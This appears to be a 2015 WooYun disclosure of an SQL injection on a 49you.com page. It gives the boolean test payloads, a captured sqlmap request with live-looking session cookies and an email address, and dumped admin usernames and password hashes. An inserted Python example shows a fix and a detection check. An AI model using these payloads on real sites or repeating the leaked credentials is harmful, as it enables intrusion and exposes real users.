
Vulnerability summary

Defect ID: wooyun-2015-0123278

Title: MySQL injection via a pseudo-static URL on a 49you site (exposes the user database)

Vendor: 49you.com

Author: DloveJ

Submitted: 2015-06-29 13:03

Fixed: 2015-08-13 13:06

Published: 2015-08-13 13:06

Type: SQL injection

Severity: High

Self-assessed rank: 14

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure timeline:

2015-06-29: Details sent to the vendor, awaiting vendor handling
2015-06-29: Vendor confirmed; details visible to the vendor only
2015-07-09: Details opened to core white hats and domain experts
2015-07-19: Details opened to regular white hats
2015-07-29: Details opened to intern white hats
2015-08-13: Details opened to the public

Summary:

I'm in it for the bounty. The user database is exposed!

Details:

http://gm.49you.com/order/line/rid/15158.html

[image: 1.jpg]

Manual test: appending and 1=1 returns the normal page

[image: 2.jpg]

and 1=2 returns an abnormal page

[image: 3.jpg]

With the injection confirmed, hand it to sqlmap.
Captured request:

GET /order/line/rid/15158* HTTP/1.1
Host: gm.49you.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: member=yxtest123; member=yxtest123; member_referrer=https%3A%2F%2Fs.bt.gg%2F; location_ref=http%3A%2F%2Fsxd.49you.com%2F%3Fid%3D16187; PHPSESSID=3a24h6lf1hfhvd434574nimfd0; pt_usname=yxtest123; web_member_login_status=CWVWblEoUT9fcQB2ADI%3D; web_member_name=A38CfQB1UWYBJlR1BmRSYlQ1; web_member_id=VDIANFo6U2VaOVhlCGxRYg%3D%3D; web_member_level=5; web_member_money=USEDMlQn; web_member_email=dongdongxuehei%40163.com; web_member_active=1; web_member_pid=5; web_member_str=VjoHNAc2AjQDZVBnBDEOaVE2D2cHawppW2BbbgYwAjZUPlhoBmQAMgcxXm8AZgRhUWRYMAZtAWtdZ1o8UWUJPA%3D%3D; web_member_cid=CW0DNlFmBGZQN1dnBDEDYQ%3D%3D; web_member_uc=0; tmp_user_name=yxtest123; returl=http%3A//xfz.49you.com; Hm_lvt_cecd4084f9ba090ffb3d5c7a18e234c5=1435462243,1435466310; Hm_lpvt_cecd4084f9ba090ffb3d5c7a18e234c5=1435470407


The * marks the injection point.

[image: 4.jpg]

[image: 5.jpg]

[image: 6.jpg]
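The defect behind the and 1=1 / and 1=2 differential above is an id taken from a pseudo-static path (/order/line/rid/15158.html) and pasted straight into a query. The following is an added illustration, not code from the report or from 49you.com (the page does not show the server-side code at all): it models the handler in Python against an in-memory SQLite table with a constructed orders table, shows the vulnerable concatenation beside a hardened version that whitelists the id to digits and binds it as a parameter, and adds a small log check that flags pseudo-static ids which are not purely numeric. The table and column names, the sample rows and the log lines are all made up for the example.

```python
import re
import sqlite3
from urllib.parse import unquote

# Constructed sample data; the real schema is not on the page and these names
# (orders, rid, title) are placeholders for the example only.
SAMPLE_ROWS = [(15158, "order 15158"), (15159, "order 15159")]

# Pseudo-static route: whatever sits between /rid/ and an optional .html is the id.
ROUTE = re.compile(r"^/order/line/rid/(?P<rid>[^/?]*?)(?:\.html)?$")
# Whitelist for a legitimate id: digits only, bounded length.
RID_OK = re.compile(r"^[0-9]{1,10}$")

# Constructed access-log lines in "METHOD PATH PROTO" form.
SAMPLE_LOG = [
    "GET /order/line/rid/15158.html HTTP/1.1",
    "GET /order/line/rid/15158%20and%201=1.html HTTP/1.1",
    "GET /order/line/rid/15158%20and%201=2.html HTTP/1.1",
    "GET /order/line/rid/15159.html HTTP/1.1",
]


def make_db():
    """In-memory stand-in for the site's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE orders (rid INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO orders VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def extract_rid(path):
    """Return the raw id text a naive rewrite rule would hand to the handler."""
    m = ROUTE.match(path)
    return m.group("rid") if m else None


def lookup_vulnerable(conn, raw_rid):
    """The defect: the pseudo-static id is concatenated into SQL unchecked.

    'rid = 15158 and 1=1' still matches the row; 'rid = 15158 and 1=2'
    matches nothing, which is exactly the page difference the report used.
    """
    sql = "SELECT title FROM orders WHERE rid = " + raw_rid
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_hardened(conn, raw_rid):
    """Fix: reject anything that is not a plain integer, then bind it as a parameter."""
    if raw_rid is None or not RID_OK.match(raw_rid):
        raise ValueError("invalid rid")  # caller should answer 400, not run SQL
    row = conn.execute(
        "SELECT title FROM orders WHERE rid = ?", (int(raw_rid),)
    ).fetchone()
    return row[0] if row else None


def suspicious_paths(log_lines):
    """Detection: flag request paths whose pseudo-static id is not purely numeric."""
    hits = []
    for line in log_lines:
        parts = line.split()
        path = parts[1] if len(parts) > 1 else ""
        rid = extract_rid(unquote(path))  # decode %20 etc. before checking
        if rid is not None and not RID_OK.match(rid):
            hits.append(path)
    return hits


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, 1=1:", lookup_vulnerable(db, "15158 and 1=1"))
    print("vulnerable, 1=2:", lookup_vulnerable(db, "15158 and 1=2"))
    print("hardened, plain id:", lookup_hardened(db, "15158"))
    print("flagged log paths:", suspicious_paths(SAMPLE_LOG))
```

The whitelist runs before the query, so the payload never reaches the database driver; parameter binding is the second layer in case a non-numeric field is ever added to the same route. The log check is deliberately narrow (a pseudo-static id that contains anything but digits), which keeps it cheap to run over web-server logs and free of keyword lists.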


Proof:

current database:    'customer_new_49you'


available databases [2]:
[*] customer_new_49you
[*] information_schema


Database: customer_new_49you
[12 tables]
+-------------------+
| ap_admininfo |
| ap_evalute |
| ap_loginfo |
| ap_plo_category |
| ap_ploblem |
| ap_qqadmin |
| ap_ratcontent |
| ap_rating |
| ap_report |
| ap_screen |
| ap_spirit_config |
| ap_spirit_ploblem |
+-------------------+


Dump a few rows to take a look (blank cells are columns the dump left empty).

tid | role | status | addtime    | headimg | username | truename | password
1   | 4    | 1      | 0          |         | admin    |          | 4d1906e96fa462cefdb5eadcbf461774
20  | 3    | 0      | 1402306877 |         | GM-001   |          | 3ce90681eb42ef5c60d150c1210d07b2
21  | 2    | 0      | 1402307112 |         | GM-      |          | dc483e80a7a0bd9ef71d8cf973673924

Fix recommendation:

Copyright notice: when reposting, credit the source DloveJ@乌云 (WooYun)


Vendor response

Vendor response:

Severity: High

Rank: 10

Confirmed: 2015-06-29 13:05

Vendor reply:

This issue has already been reported by someone else.
Thanks to white hat @DloveJ; the technical team has received it and is handling it.

Latest status:

None yet

